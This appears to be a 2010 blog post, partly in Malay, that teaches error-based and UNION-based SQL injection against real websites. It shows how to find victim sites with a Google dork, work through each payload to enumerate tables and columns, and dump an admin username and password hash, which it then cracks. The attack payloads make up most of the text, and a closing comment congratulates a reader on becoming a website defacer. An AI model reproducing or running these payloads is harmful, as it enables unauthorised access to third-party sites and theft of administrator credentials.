Keywords you should/must know :Google Dork that you should use is "inurl:news.php?id="
Character : ', -
Comments : /*, --
INFORMATION :
- "Information_schema" only worked on MYSQL Versi 5.x and above.
- "Information_schema" not worked on MYSQL Versi 4.x.xx and below.
Go to www.google.com and search for victim site with that dork.
Step 1
[site]/news.php?id=1
--- Add character ' at the end of the url to look at any site so we can find if the site is vuln to SQL Injection or not.
Example :
[site]/news.php?id=1'
atau
[site]/news.php?id=-1
Example Error came out :
Warning: mysql_fetch_array(): supplied argument is not a valid MYSQL result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line
Step 2
Find how many table was in the database.
-- Put +order+by+1-- at the end of the url.
Example :
[site]/news.php?id=1+order+by+1--
or
[site]/news.php?id=1+order+by+1/* Check it gradually
[site]/news.php?id=1+order+by+2/*
[site]/news.php?id=1+order+by+3/* Until error come out on it page.
[site]/news.php?id=1+order+by+4/* Error came out on table number 4!
And so for this tutorial, the total table in the database for the site is 3.
Step 3
Use the Union Select command with sequence table obtained during the second step to retrieve the numbers that we will use later. In the present case, the sequence numbers are up three tables.
--- Command will be used : +union+select+1,2,3--
Example :
[site]/news.php?id=1+union+select+1,2,3--
Figures 2 pop out on the page site.
--- Then, we enter the version() on that figures 2,
Example :
[site]/news.php?id=1+union+select+1,version(),3--
and the version will appear in the figures on the page.
Example :
5.1.47-community-log
INFORMATION :Step 4
user() = getting username that used with the database
(Contoh : mae21@localhost)
database() = getting the database name
(Contoh : mae21_db)
version() = getting what version of their mysql
(Contoh : 5.1.47-community-log)
To retrieve all table names on the site, use this command
table_name
--- Put in the numbers (2) that came out earlier.
+from+information_schema.tables--
--- Put it at the end of the url.
Example :
[site]/news.php?id=1+union+select+1,table_name,3+from+information_schema.tables--
Step 5
Copy all the contents of the information contained in the table.
group_concat(table_name)
--- Put in the numbers (2) that came out earlier.
+from+information_schema.tables+where+table_schema=database()--
--- Put it at the end of the url.
Example :
[site]/news.php?id=1+union+select+1,group_concat(table_name),3+from+
information_schema.tables+where+table_schema=database()--
Step 6
Remove the existing content in TABLE
group_concat(column_name)
--- Put in the numbers (2) that came out earlier.
+from+information_schema.columns+where+table_name=0xHEXA--
(PUT THE TABLE NAME ALREADY CONVERTED TO HEXADECIMEL)
INFORMATION:Example :
Website that can be used to convert the table name to hexadecimel
Column that we will use as for example is ADMIN.
When it converted the result was 41444D494E
[site]/news.php?id=1+union+select+1,group_concat(column_name),3+from+
information_schema.columns+where+table_name=0x41444D494E--
Step 7
Remove the contents of the results we have obtained from the table ADMIN
concat_ws(0x3a,"column names contained in the ADMIN's table")
--- Put in the numbers (2) that came out earlier.
+from+Admin--
--- Original's column
Example :
[site]/news.php?id=1+union+select+1,concat_ws(0x3a,id,username,password),3+from+admin--
And we will get admin username and password data for the website.
The information coming out is as follows :
"webmaster admin:8dded6912a401ad44ec9b688fd124e22"
Decrypt MD5 Hash of the information contained in www.md5decrypter.co.uk
8dded6912a401ad44ec9b688fd124e22 = "iluvmyself" (decrypted!)
Now you have the username and password for the website.
Step 8 (Last Step)
Find the Login page for admin..
"Happy trying it and enjoy hacking for education ..." :)

December 17, 2010 at 1:12 PM
em.. menarik nie
December 17, 2010 at 4:53 PM
terima kasih kerana memberi respon dan tahniah kerana sudah berjaya menjadi defacer.. :)